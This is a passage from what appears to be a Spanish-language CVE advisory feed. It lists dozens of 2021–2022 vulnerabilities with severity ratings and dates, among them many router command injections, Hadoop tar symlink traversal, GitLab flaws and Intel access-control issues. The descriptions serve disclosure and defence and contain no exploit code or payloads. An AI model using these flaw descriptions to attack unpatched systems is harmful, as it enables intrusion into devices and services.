    En Apache Hadoop, la función unTar usa la función unTarUsingJava en Windows y la utilidad tar incorporada en Unix y otros sistemas operativos. Como resultado, una entrada TAR puede crear un enlace simbólico bajo el directorio de extracción esperado que apunta a un directorio externo. Una entrada TAR posterior puede extraer un archivo arbitrario en el directorio externo usando el nombre del enlace simbólico. Sin embargo, esto sería detectado por la misma comprobación targetDirPath en Unix debido a la llamada getCanonicalPath. Sin embargo, en Windows, getCanonicalPath no resuelve los enlaces simbólicos, lo que evita la comprobación. unpackEntries durante la extracción del TAR sigue los enlaces simbólicos, lo que permite escribir fuera del directorio base esperado en Windows. Esto ha sido abordado en Apache Hadoop versión 3.2.3
  • CVE-2022-26933
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información en Windows NTFS
  • CVE-2022-26925
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Falsificación de Windows LSA
  • CVE-2022-29107
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Omisión de Funciones de Seguridad de Microsoft Office
  • CVE-2022-23935
    Severidad: ALTA
    Fecha de publicación: 25/01/2022
    Fecha de última actualización: 08/08/2023
    lib/Image/ExifTool.pm en ExifTool antes de la versión 12.38 maneja mal una comprobación de $file =~ /|$/, lo que lleva a la inyección de comandos
  • CVE-2022-27002
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    se ha detectado que Arris TR3300 versión v1.0.13, contiene una vulnerabilidad de inyección de comandos en la función ddns por medio de los parámetros ddns_name, ddns_pwd, h_ddns?ddns_host. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-23443
    Severidad: MEDIA
    Fecha de publicación: 04/05/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en Fortinet FortiSOAR versiones anteriores a 7.2.0, permite a atacantes no autenticados acceder a los datos de la API de la pasarela por medio de peticiones HTTP GET diseñadas
  • CVE-2022-27411
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado E7que TOTOLINK N600R versión v5.3c.5507_B20171031, contiene una vulnerabilidad de inyección de comandos por medio del parámetro QUERY_STRING en la función "Main"
  • CVE-2022-28575
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que se presenta una vulnerabilidad de inyección de comandos en la interfaz setopenvpnclientcfg del router TOTOlink A7100RU (versión v7.4cu.2313_b20191024), que permite a atacantes ejecutar comandos arbitrarios mediante una carga útil cuidadosamente construida
  • CVE-2022-28577
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de inyección de comandos en la interfaz delParentalRules del router TOTOlink A7100RU (versión v7.4cu.2313_b20191024), que permite a un atacante ejecutar comandos arbitrarios mediante una carga útil cuidadosamente construida
  • CVE-2022-28578
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de inyección de comandos en la interfaz setOpenVpnCfg del router TOTOlink A7100RU (versión v7.4cu.2313_b20191024), que permite a un atacante ejecutar comandos arbitrarios mediante una carga útil cuidadosamente construida
  • CVE-2022-28580
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de inyección de comandos en la interfaz setL2tpServerCfg del router TOTOlink A7100RU (versión v7.4cu.2313_b20191024), que permite a un atacante ejecutar comandos arbitrarios mediante una carga útil cuidadosamente construida
  • CVE-2022-28581
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de inyección de comandos en la interfaz setWiFiAdvancedCfg del router TOTOlink A7100RU (versión v7.4cu.2313_b20191024), que permite a un atacante ejecutar comandos arbitrarios mediante una carga útil cuidadosamente construida
  • CVE-2022-28582
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de inyección de comandos en la interfaz setWiFiSignalCfg del router TOTOlink A7100RU (versión v7.4cu.2313_b20191024), que permite a un atacante ejecutar comandos arbitrarios mediante una carga útil cuidadosamente construida
  • CVE-2022-28583
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de inyección de comandos en la interfaz setWiFiWpsCfg del router TOTOlink A7100RU (versión v7.4cu.2313_b20191024), que permite a un atacante ejecutar comandos arbitrarios mediante una carga útil cuidadosamente construida
  • CVE-2022-28584
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de inyección de comandos en la interfaz setWiFiWpsStart del router TOTOlink A7100RU (versión v7.4cu.2313_b20191024), que permite a un atacante ejecutar comandos arbitrarios mediante una carga útil cuidadosamente construida
  • CVE-2022-28579
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de inyección de comandos en la interfaz setParentalRules del router TOTOlink A7100RU (versión v7.4cu.2313_b20191024), que permite a un atacante ejecutar comandos arbitrarios mediante una carga útil cuidadosamente construida
  • CVE-2022-28556
    Severidad: MEDIA
    Fecha de publicación: 04/05/2022
    Fecha de última actualización: 08/08/2023
    Tenda AC15 versión US_AC15V1.0BR_V15.03.05.20_multi_TDE01.bin, es vulnerable a un desbordamiento del búfer. La vulnerabilidad de desbordamiento de pila se encuentra en la interfaz /goform/setpptpservercfg de la web. Los datos post enviados startip y endip son copiados a la pila usando la función sanf, resultando en un desbordamiento de pila. Del mismo modo, esta vulnerabilidad puede usarse junto con CVE-2021-44971
  • CVE-2021-28715
    Severidad: BAJA
    Fecha de publicación: 06/01/2022
    Fecha de última actualización: 08/08/2023
    Un huésped puede forzar al controlador de netback de Linux a acaparar grandes cantidades de memoria del kernel Este registro de información CNA está relacionado con múltiples CVEs; el texto explica qué aspectos/vulnerabilidades corresponden a cada CVE]. Los paquetes de datos entrantes para un huésped en el controlador de netback del kernel de Linux son almacenados en el búfer hasta que el huésped está listo para procesarlos. Son tomadas algunas medidas para evitar que sean acumulados demasiados datos, pero éstas pueden ser obviadas por el huésped: Se presenta un tiempo de espera en el que el lado del cliente de una interfaz puede dejar de consumir nuevos paquetes antes de que sea asumido que ha sido estancado, pero este tiempo de espera es bastante largo (60 segundos por defecto). Usando una conexión UDP en una interfaz rápida pueden acumularse fácilmente gigabytes de datos en ese tiempo. (CVE-2021-28715) El tiempo de espera podría incluso no dispararse nunca si el huésped consigue tener sólo una ranura libre en su página de anillo de cola RX y el siguiente paquete requeriría más de una ranura libre, lo que puede ser el caso cuando se usa OSG, XDP o hashing de software. (CVE-2021-28714)
  • CVE-2022-28557
    Severidad: ALTA
    Fecha de publicación: 04/05/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de inyección de comandos en la interfaz /goform/setsambacfg de la web del dispositivo Tenda AC15 versión US_AC15V1.0BR_V15.03.05.20_multi_TDE01.bin, que también puede cooperar con CVE-2021-44971 para causar una ejecución de comandos arbitrarios incondicionales
  • CVE-2022-29945
    Severidad: MEDIA
    Fecha de publicación: 29/04/2022
    Fecha de última actualización: 08/08/2023
    Los dispositivos de drones de DJI vendidos en 2017 hasta 2022, transmiten información no cifrada sobre la ubicación física del operador del dron por medio del protocolo AeroScope
  • CVE-2022-22706
    Severidad: MEDIA
    Fecha de publicación: 03/03/2022
    Fecha de última actualización: 08/08/2023
    El controlador del kernel de la GPU Arm Mali permite a un usuario sin privilegios conseguir acceso de escritura a páginas de memoria de sólo lectura. Esto afecta a Midgard r26p0 hasta r31p0, Bifrost r0p0 hasta r35p0, y Valhall r19p0 hasta r35p0
  • CVE-2022-28471
    Severidad: MEDIA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 17/08/2023
    En ffjpeg (commit hash: caade60), la función bmp_load() en el archivo bmp.c contiene una vulnerabilidad de desbordamiento de enteros, que resulta eventualmente en un desbordamiento de pila en jfif_encode() en jfif.c. Esto es debido a un parche incompleto para el problema 38
  • CVE-2022-28164
    Severidad: MEDIA
    Fecha de publicación: 06/05/2022
    Fecha de última actualización: 08/08/2023
    La aplicación Brocade SANnav versiones anteriores a SANnav versión 2.2.0, usa el algoritmo de cifrado simétrico Blowfish para el almacenamiento de contraseñas. Esto podría permitir a un atacante autentificado descifrar las contraseñas de las cuentas almacenadas
  • CVE-2022-29934
    Severidad: ALTA
    Fecha de publicación: 29/04/2022
    Fecha de última actualización: 08/08/2023
    USU Oracle Optimization versiones anteriores a 5.17.5, carece de autenticación Polkit, lo que permite a usuarios de smartcollector conseguir acceso root por medio de pkexec. NOTA: este no es un producto de Oracle Corporation
  • CVE-2022-29935
    Severidad: MEDIA
    Fecha de publicación: 29/04/2022
    Fecha de última actualización: 08/08/2023
    La optimización de Oracle USU versiones anteriores a 5.17.5, permite a atacantes detectar las credenciales de quantum por medio de una descarga del instalador de agentes. NOTA: este no es un producto de Oracle Corporation
  • CVE-2022-25375
    Severidad: BAJA
    Fecha de publicación: 20/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en el archivo drivers/usb/gadget/function/rndis.c en el kernel de Linux versiones anteriores a 5.16.10. El gadget USB RNDIS no comprueba el tamaño del comando RNDIS_MSG_SET. Los atacantes pueden obtener información confidencial de la memoria del kernel
  • CVE-2022-20109
    Severidad: MEDIA
    Fecha de publicación: 03/05/2022
    Fecha de última actualización: 08/08/2023
    En ion, se presenta un posible uso de memoria previamente liberada debido a la actualización inapropiada del recuento de referencias. Esto podría conllevar a una escalada de privilegios local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS06399915; ID de Incidencia: ALPS06399915
  • CVE-2022-24437
    Severidad: ALTA
    Fecha de publicación: 01/05/2022
    Fecha de última actualización: 08/08/2023
    El paquete git-pull-or-clone versiones anteriores a 2.0.2, es vulnerable a una inyección de comandos debido al uso de la función --upload-pack de git, que también es compatible con git clone. La fuente incluye el uso de la API spawn() del proceso hijo seguro. Sin embargo, el parámetro outpath que le es pasado puede ser un argumento de la línea de comandos del comando git clone y resultar en una inyección arbitraria de comandos
  • CVE-2022-29566
    Severidad: MEDIA
    Fecha de publicación: 21/04/2022
    Fecha de última actualización: 08/08/2023
    El documento Bulletproofs versión 2017/1066 maneja inapropiadamente la generación de Fiat-Shamir porque el cálculo del hash no incluye todos los valores públicos de la declaración de prueba de conocimiento cero, así como todos los valores públicos calculados en la prueba, también conocido como el problema del corazón congelado
  • CVE-2022-20110
    Severidad: MEDIA
    Fecha de publicación: 03/05/2022
    Fecha de última actualización: 08/08/2023
    En ion, se presenta un posible uso de memoria previamente liberada debido a una condición de carrera. Esto podría conllevar a una escalada de privilegios local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS06399915; ID de Incidencia: ALPS06399901
  • CVE-2022-28055
    Severidad: ALTA
    Fecha de publicación: 04/05/2022
    Fecha de última actualización: 08/08/2023
    Fusionpbx versiones v4.4 y anteriores, contienen una vulnerabilidad de inyección de comandos por medio de la función download email logs
  • CVE-2022-1431
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab que afecta a todas las versiones a partir de 12.10 anteriores a 14.8.6, todas las versiones a partir de 14.9 anteriores a 14.9.4, todas las versiones a partir de 14.10 antes de 14.10.1. GitLab no manejaba correctamente las peticiones maliciosas al endpoint de la API de PyPi, lo que permitía al atacante causar un consumo no controlado de recursos
  • CVE-2022-20004
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    En la función checkSlicePermission del archivo SliceManagerService.java, es posible acceder a cualquier URI de slice debido a una comprobación de entrada inapropiada. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-179699767
  • CVE-2022-22011
    Severidad: BAJA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Graphics Component. Este ID de CVE es diferente de CVE-2022-26934, CVE-2022-29112
  • CVE-2022-22015
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Remote Desktop Protocol (RDP)
  • CVE-2022-22454
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    IBM InfoSphere Information Server versión 11.7, podría permitir a un atacante autenticado localmente ejecutar comandos arbitrarios en el sistema mediante el envío de una petición especialmente diseñada
  • CVE-2022-25342
    Severidad: MEDIA
    Fecha de publicación: 20/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en los dispositivos Olivetti d-COLOR MF3555 2XD_S000.002.271. La aplicación web está afectada por un control de acceso roto. No valida correctamente las solicitudes de acceso a datos y funcionalidades bajo la ruta /mngset/authset. Al no verificar los permisos de acceso a los recursos, permite a un potencial atacante ver páginas no permitidas
  • CVE-2022-26923
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Active Directory Domain Services
  • CVE-2022-28895
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de inyección de comandos en el componente /setnetworksettings/IPAddress de D-Link DIR882 versión DIR882A1_FW130B06, permite a atacantes escalar privilegios a root por medio de una carga útil diseñada
  • CVE-2022-28896
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de inyección de comandos en el componente /setnetworksettings/SubnetMask de D-Link DIR882 versión DIR882A1_FW130B06, permite a atacantes escalar privilegios a root por medio de una carga útil diseñada
  • CVE-2022-28901
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de inyección de comandos en el componente /SetTriggerLEDBlink/Blink de D-Link DIR882 versión DIR882A1_FW130B06, permite a atacantes escalar privilegios a root por medio de una carga útil diseñada
  • CVE-2022-28905
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink N600R versión V5.3c.7159_B20190425, contiene una vulnerabilidad de inyección de comandos por medio del parámetro devicemac en /setting/setDeviceName
  • CVE-2022-28906
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink N600R versión V5.3c.7159_B20190425, contiene una vulnerabilidad de inyección de comandos por el parámetro langtype en /setting/setLanguageCfg
  • CVE-2022-28907
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink N600R versión V5.3c.7159_B20190425, contiene una vulnerabilidad de inyección de comandos por medio de la función hosttime en /setting/NTPSyncWithHost
  • CVE-2022-28908
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink N600R versión V5.3c.7159_B20190425, contiene una vulnerabilidad de inyección de comandos por medio del parámetro ipdoamin en /setting/setDiagnosisCfg
  • CVE-2022-28909
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink N600R versión V5.3c.7159_B20190425 contiene una vulnerabilidad de inyección de comandos por medio del parámetro webwlanidx en /setting/setWebWlanIdx
  • CVE-2022-28910
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink N600R versión V5.3c.7159_B20190425, contiene una vulnerabilidad de inyección de comandos por medio del parámetro devicename en /setting/setDeviceName
  • CVE-2022-28911
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink N600R versión V5.3c.7159_B20190425, contiene una vulnerabilidad de inyección de comandos por medio del parámetro filename en /setting/CloudACMunualUpdate
  • CVE-2022-28912
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink N600R versión V5.3c.7159_B20190425, contiene una vulnerabilidad de inyección de comandos por medio del parámetro filename en /setting/setUpgradeFW
  • CVE-2022-28913
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink N600R versión V5.3c.7159_B20190425, contiene una vulnerabilidad de inyección de comandos por medio del parámetro filename en /setting/setUploadSetting
  • CVE-2022-28915
    Severidad: ALTA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que D-Link DIR-816 versión A2_v1.10CNB04, contiene una vulnerabilidad de inyección de comandos por medio de los parámetros admuser y admpass en /goform/setSysAdm
  • CVE-2022-29112
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Graphics Component. Este ID de CVE es diferente de CVE-2022-22011, CVE-2022-26934
  • CVE-2022-1460
    Severidad: MEDIA
    Fecha de publicación: 11/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab afectando a todas las versiones a partir de la 9.2 anteriores a 14.8.6, todas las versiones a partir de la 14.9 anteriores a 14.9.4, todas las versiones a partir de la 14.10 anteriores a 14.10.1. GitLab no llevaba a cabo las autorizaciones correctas en los pipelines programados, lo que permitía a un usuario malicioso ejecutar un pipeline en el contexto de otro usuario
  • CVE-2022-1510
    Severidad: MEDIA
    Fecha de publicación: 11/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab afectando a todas las versiones a partir de la 13.9 anteriores a 14.8.6, a todas las versiones a partir de la 14.9 anteriores a 14.9.4 y a todas las versiones a partir de la 14.10 anteriores a 14.10.1. GitLab no manejaba correctamente el texto malicioso en la página de detalles del editor de CI y de la tubería de CI, permitiendo al atacante causar un consumo no controlado de recursos
  • CVE-2022-1545
    Severidad: MEDIA
    Fecha de publicación: 11/05/2022
    Fecha de última actualización: 08/08/2023
    Era posible divulgar detalles de notas confidenciales creadas por medio de la API en Gitlab CE/EE, afectando a todas las versiones desde la 13.2 hasta la 14.8.6, 14.9 anteriores a 14.9.4 y 14.10 anteriores a 14.10.1, si un miembro del proyecto no autorizado era etiquetado en la nota
  • CVE-2022-22521
    Severidad: MEDIA
    Fecha de publicación: 27/04/2022
    Fecha de última actualización: 09/08/2023
    En la herramienta de programación de Miele Benchmark con versiones anteriores a la 1.2.71, los archivos ejecutables manipulados por los atacantes se ejecutan sin saberlo con privilegios de usuario. Un atacante con bajos privilegios puede engañar a un usuario con privilegios administrativos para ejecutar estos binarios como admin
  • CVE-2022-29846
    Severidad: MEDIA
    Fecha de publicación: 11/05/2022
    Fecha de última actualización: 08/08/2023
    En Ipswitch Progress WhatsUp Gold versiones 16.1 hasta 21.1.1, y 22.0.0, es posible que un atacante no autenticado obtenga el número de serie de la instalación de WhatsUp Gold
  • CVE-2022-28871
    Severidad: MEDIA
    Fecha de publicación: 25/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de denegación de servicio (DoS) en F-Secure Atlant versiones anteriores a 2022-04-12_01 por la que el componente fsicapd usado en ciertos productos de F-Secure mientras escanea paquetes/archivos de gran tamaño consume demasiada memoria, pudiendo llegar a bloquear el motor de escaneo. La explotación puede ser desencadenada remotamente por un atacante
  • CVE-2022-28573
    Severidad: ALTA
    Fecha de publicación: 02/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que D-Link DIR-823-Pro versión v1.0.2, contiene una vulnerabilidad de inyección de comandos en la función SetNTPserverSeting. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro system_time_timezone
  • CVE-2022-28056
    Severidad: ALTA
    Fecha de publicación: 02/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que ShopXO versiones cv2.2.5 y anteriores, contienen una vulnerabilidad de reinstalación del sistema por medio de la función Add en el archivo app/install/controller/Index.php
  • CVE-2022-24935
    Severidad: MEDIA
    Fecha de publicación: 28/04/2022
    Fecha de última actualización: 08/08/2023
    Los productos de Lexmark versiones hasta 10-02-2022, presentan un Control de Acceso Incorrecto
  • CVE-2022-22782
    Severidad: MEDIA
    Fecha de publicación: 28/04/2022
    Fecha de última actualización: 08/08/2023
    Zoom Client for Meetings para Windows versiones anteriores a 5.9.7, Zoom Rooms for Conference Room para Windows versiones anteriores a 5.10.0, Zoom Plugins for Microsoft Outlook para Windows versiones anteriores a 5.10.3 y Zoom VDI Windows Meeting Clients versiones anteriores a 5.9.6; eran susceptibles de un problema de escalada de privilegios local durante la operación de reparación del instalador. Un actor malicioso podría usar esto para eliminar potencialmente archivos o carpetas a nivel de sistema, causando problemas de integridad o disponibilidad en la máquina anfitriona del usuario
  • CVE-2022-22783
    Severidad: MEDIA
    Fecha de publicación: 28/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en Zoom On-Premise Meeting Connector Controller versión 4.8.102.20220310 y On-Premise Meeting Connector MMR versión 4.8.102.20220310, expone fragmentos de memoria de proceso a clientes conectados, que podrían ser observados por un atacante pasivo
  • CVE-2022-28054
    Severidad: ALTA
    Fecha de publicación: 02/05/2022
    Fecha de última actualización: 08/08/2023
    Un saneo inapropiado de los scripts de acción de desencadenado en VanDyke Software VShell para Windows versión v4.6.2, permite a atacantes ejecutar código arbitrario por medio de un valor diseñado
  • CVE-2022-30295
    Severidad: MEDIA
    Fecha de publicación: 06/05/2022
    Fecha de última actualización: 08/08/2023
    uClibc-ng versiones hasta 1.0.40 y uClibc versiones hasta 0.9.33.2, usan IDs de transacciones DNS predecibles que pueden conllevar a un envenenamiento de la caché DNS. Esto está relacionado con el restablecimiento de un valor a 0x2
  • CVE-2022-22319
    Severidad: MEDIA
    Fecha de publicación: 09/05/2022
    Fecha de última actualización: 08/08/2023
    IBM Robotic Process Automation versión 21.0.1, podría permitir que un usuario registrado en el sistema eliminara físicamente una cola, lo que podría causar la interrupción de cualquier script dependiente de la cola. IBM X-Force ID: 218366
  • CVE-2022-24449
    Severidad: ALTA
    Fecha de publicación: 28/04/2022
    Fecha de última actualización: 08/08/2023
    Solar appScreener versiones hasta 3.10.4, cuando no es presentada una licencia válida, permite ataques de tipo XXE y SSRF por medio de un documento XML diseñado
  • CVE-2021-36460
    Severidad: MEDIA
    Fecha de publicación: 25/04/2022
    Fecha de última actualización: 08/08/2023
    VeryFitPro (com.veryfit2hr.second) versión 3.2.8, cifra la contraseña de la cuenta localmente en el dispositivo y usa el hash para autenticar en toda la comunicación con la API del backend, incluyendo el inicio de sesión, el registro y el cambio de contraseñas. Esto permite a un atacante en posesión del hash tomar el control de la cuenta de un usuario, haciendo inútiles las ventajas de almacenar las contraseñas con hash en la base de datos
  • CVE-2022-26111
    Severidad: ALTA
    Fecha de publicación: 25/04/2022
    Fecha de última actualización: 08/08/2023
    Los componentes BeanShell de IRISNext versiones hasta 9.8.28, permiten una ejecución de comandos arbitrarios en el servidor de destino mediante la creación de una búsqueda personalizada (o la edición de una búsqueda existente/predefinida) de los documentos. Los componentes de búsqueda permiten añadir expresiones BeanShell que resultan en una Ejecución de Código Remota en el contexto del usuario de la aplicación IRISNext, que es ejecutada en el servidor web
  • CVE-2021-45841
    Severidad: MEDIA
    Fecha de publicación: 25/04/2022
    Fecha de última actualización: 08/08/2023
    En Terramaster F4-210, F2-210 TOS versiones 4.2.X (4.2.15-2107141517), un atacante puede autofirmar las cookies de sesión conociendo la dirección MAC del objetivo y el hash de la contraseña del usuario. Los usuarios invitados (deshabilitados por defecto) pueden ser abusados usando un hash nulo/vacío y permitir a un atacante no autenticado iniciar sesión como invitado
  • CVE-2022-37770
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que libjpeg commit 281daa9 contiene un fallo de segmentación por la función LineMerger::GetNextLowpassLine en el archivo linemerger.cpp. Esta vulnerabilidad permite a atacantes causar una Denegación de Servicio (DoS) por medio de un archivo diseñado.
  • CVE-2022-37769
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que libjpeg commit 281daa9 contiene un fallo de segmentación por medio de la función HuffmanDecoder::Get en el archivo huffmandecoder.hpp. Esta vulnerabilidad permite a atacantes causar una Denegación de Servicio (DoS) por medio de un archivo diseñado.
  • CVE-2022-28709
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en el firmware de algunos controladores Ethernet Intel(R) E810 versiones anteriores 1.6.1.9, puede permitir a un usuario privilegiado habilitar potencialmente la denegación de servicio por medio de acceso local.
  • CVE-2022-26017
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en el software Intel(R) DSA para versiones anteriores a 22.2.14, puede permitir que un usuario autenticado permita potencialmente una escalada de privilegios por medio de un acceso adyacente.
  • CVE-2022-25966
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en el software Intel(R) Edge Insights for Industrial versiones anteriores a 2.6.1, puede permitir que un usuario autenticado habilite potencialmente una escalada de privilegios por medio del acceso local.
  • CVE-2022-25899
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Una omisión de la autenticación en el software Open AMT Cloud Toolkit mantenido por Intel(R) versiones anteriores a 2.0.2 y 2.2.2, puede permitir que un usuario no autenticado permita potencialmente una escalada de privilegios por medio del acceso a la red.
  • CVE-2022-23182
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en el software Intel(R) Data Center Manager versiones anteriores a 4.1, puede permitir que un usuario no autenticado habilite potencialmente una escalada de privilegios por medio del acceso adyacente.
  • CVE-2022-21812
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en el software Intel(R) HAXM versiones anteriores a 7.7.1, puede permitir que un usuario autenticado habilite potencialmente una escalada de privilegios por medio del acceso local.
  • CVE-2022-21152
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en el software Intel(R) Edge Insights for Industrial versiones anteriores a 2.6.1, puede permitir que un usuario autenticado permita potencialmente la divulgación de información por medio del acceso local.
  • CVE-2022-21148
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en el software Intel(R) Edge Insights for Industrial versiones anteriores a 2.6.1, puede permitir que un usuario autenticado habilite potencialmente una escalada de privilegios por medio del acceso local.
  • CVE-2022-21140
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado para algunos productos Intel(R) PROSet/Wireless WiFi y Killer(TM) WiFi puede permitir que un usuario privilegiado permita potencialmente la divulgación de información por medio del acceso local.
  • CVE-2021-33128
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en el firmware de algunos controladores Ethernet E810 de Intel(R) versiones anteriores a 1.6.0.6, puede permitir a un usuario privilegiado habilitar potencialmente la denegación de servicio por acceso local.
  • CVE-2021-23188
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado para algunos productos Intel(R) PROSet/Wireless WiFi y Killer(TM) WiFi puede permitir que un usuario autenticado permita potencialmente la divulgación de información por medio del acceso local.
  • CVE-2022-33311
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de la restricción de navegación en Address Book de Cybozu Office versiones 10.0.0 a 10.8.5, permite a un atacante remoto autenticado obtener los datos de la Libreta de direcciones por medio de vectores no especificados.
  • CVE-2022-32583
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de restricciones de operación en el Programador de Cybozu Office versiones 10.0.0 a 10.8.5, permite a un atacante remoto autenticado alterar los datos del Programador por medio de vectores no especificados.
  • CVE-2022-32544
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de restricciones de operación en Project de Cybozu Office versiones 10.0.0 a 10.8.5, permite a un atacante remoto autenticado alterar los datos de Project por medio de vectores no especificados.
  • CVE-2022-25986
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de restricciones de navegación en Scheduler of Cybozu Office versiones 10.0.0 a 10.8.5, permite a un atacante remoto autenticado obtener los datos del Programador.
  • CVE-2022-36263
    Severidad: Pendiente de análisis
